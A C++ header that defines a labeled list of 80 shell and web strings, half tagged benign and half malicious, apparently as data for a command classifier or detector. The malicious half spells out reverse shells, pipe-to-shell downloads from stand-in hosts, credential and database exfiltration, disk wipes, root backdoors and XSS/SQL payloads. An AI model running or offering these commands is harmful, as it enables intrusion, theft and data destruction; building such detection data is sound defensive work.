#pragma once

#include <cstdint>

struct ContentEntry {
  const char* text;
  bool isMalicious;
  const char* explanation;
};

inline constexpr ContentEntry kContent[] = {
    // ---- benign (40) ----
    {"GET /healthz", false, "Health check"},
    {"curl localhost:8080", false, "Local service"},
    {"backup.sh --daily", false, "Scheduled backup"},
    {"ssh admin@10.0.0.12", false, "Admin SSH"},
    {"kubectl get pods", false, "Cluster read"},
    {"systemctl restart nginx", false, "Service restart"},
    {"rsync /data /backup", false, "Backup sync"},
    {"git pull origin main", false, "Code update"},
    {"ping db.internal", false, "Connectivity check"},
    {"tail -f /var/log/app.log", false, "Log tail"},
    {"apt-get update", false, "Package metadata"},
    {"df -h /var", false, "Disk check"},
    {"ufw status", false, "Firewall view"},
    {"openssl x509 -in cert.pem", false, "Inspect cert"},
    {"docker ps", false, "Container list"},
    {"crontab -l", false, "List cron"},
    {"ss -lntp", false, "Listen ports"},
    {"whoami", false, "User context"},
    {"scp file.tar.gz backup:", false, "File copy"},
    {"chmod 644 ~/.ssh/config", false, "SSH perms fix"},
    {"journalctl -u sshd --since today", false, "SSH log review"},
    {"terraform plan", false, "Infra preview"},
    {"helm list -n prod", false, "Helm releases"},
    {"aws s3 ls s3://backup-bucket", false, "S3 listing"},
    {"vault status", false, "Vault health"},
    {"grep ERROR /var/log/syslog", false, "Error search"},
    {"nmap -sV 10.0.0.0/24", false, "Internal scan"},
    {"mysql -u app -p < schema.sql", false, "DB migration"},
    {"certbot renew --dry-run", false, "Cert renewal test"},
    {"ansible-playbook deploy.yml", false, "Config deploy"},
    {"docker-compose up -d", false, "Stack launch"},
    {"git log --oneline -10", false, "Recent commits"},
    {"npm audit", false, "Dep vuln check"},
    {"etcdctl endpoint health", false, "etcd check"},
    {"systemctl status firewalld", false, "Firewall status"},
    {"lsof -i :443", false, "Port 443 check"},
    {"top -bn1 | head -20", false, "CPU snapshot"},
    {"free -m", false, "Memory check"},
    {"uptime", false, "System uptime"},
    {"last -10", false, "Recent logins"},

    // ---- malicious (40) ----
    {"curl evil.tld/p.sh|sh", true, "Pipe to shell"},
    {"wget bad.ru/dropper", true, "Unknown binary"},
    {"nc -e /bin/sh 10.0.0.9", true, "Reverse shell"},
    {"chmod 777 /etc/shadow", true, "Unsafe perms"},
    {"cat ~/.ssh/id_rsa", true, "Exfil key"},
    {"tar cz /etc | nc x 4444", true, "Archive exfil"},
    {"powershell iwr x|iex", true, "Download execute"},
    {"<script>alert(1)</script>", true, "XSS payload"},
    {"SELECT * FROM users--", true, "SQL injection"},
    {"bash -i >& /dev/tcp/x/y", true, "Bash reverse TCP"},
    {"rm -rf --no-preserve-root /", true, "Destructive rm"},
    {"echo * > /etc/sudoers", true, "Sudoers abuse"},
    {"base64 -d <<<SGVsbG8=", true, "Encoded payload"},
    {"chmod u+s /bin/bash", true, "SUID escalation"},
    {"dd if=/dev/zero of=/dev/sda", true, "Disk wipe"},
    {"curl -d@/etc/passwd x.com", true, "Credential leak"},
    {"python -c import socket,socket", true, "Reverse py shell"},
    {"find / -perm -4000 2>/dev/null", true, "SUID hunt"},
    {".\\x.exe -nop -w hidden", true, "Suspicious PS"},
    {"curl -X POST c2.bad/exfil -d @db.sql", true, "DB exfil"},
    {"ncat --exec /bin/bash attk 9001", true, "Ncat backdoor"},
    {"iptables -F", true, "Flush firewall"},
    {"useradd -o -u 0 r00t", true, "Hidden root acct"},
    {"echo 'ssh-rsa AAA..' >> authorized_keys", true, "Key injection"},
    {"python3 -m http.server 8888", true, "Data staging"},
    {"crontab -l;echo @reboot nc x 4444", true, "Cron persistence"},
    {"mount -o remount,rw /", true, "Remount root RW"},
    {"ln -sf /bin/bash /usr/bin/nologin", true, "Shell hijack"},
    {"socat TCP:evil:53 EXEC:sh", true, "DNS tunnel shell"},
    {"sed -i 's/PASS_MAX/99999/' /etc/login.defs", true, "Weaken policy"},
    {"cp /bin/sh /tmp/.hidden; chmod +s /tmp/.hidden", true, "Stashed SUID"},
    {"sshpass -p pw ssh root@victim", true, "Brute SSH"},
    {"curl -s https://pastebin.com/raw/x|bash", true, "Paste & run"},
    {"tcpdump -w /tmp/cap.pcap -c 5000", true, "Traffic sniff"},
    {"openssl enc -aes-256 -in db.sql -out e.bin", true, "Encrypt & stage"},
    {"HISTFILE=/dev/null export HISTFILE", true, "Erase history"},
    {"python3 -c 'import pty;pty.spawn(\"/bin/sh\")'", true, "PTY shell"},
    {"kill -9 $(pgrep auditd)", true, "Kill audit daemon"},
    {"echo nameserver 8.8.8.8 > /etc/resolv.conf", true, "DNS hijack"},
    {"wget -q -O- https://x.io/miner|bash", true, "Cryptominer"},
};

inline constexpr uint16_t kContentCount = sizeof(kContent) / sizeof(kContent[0]);
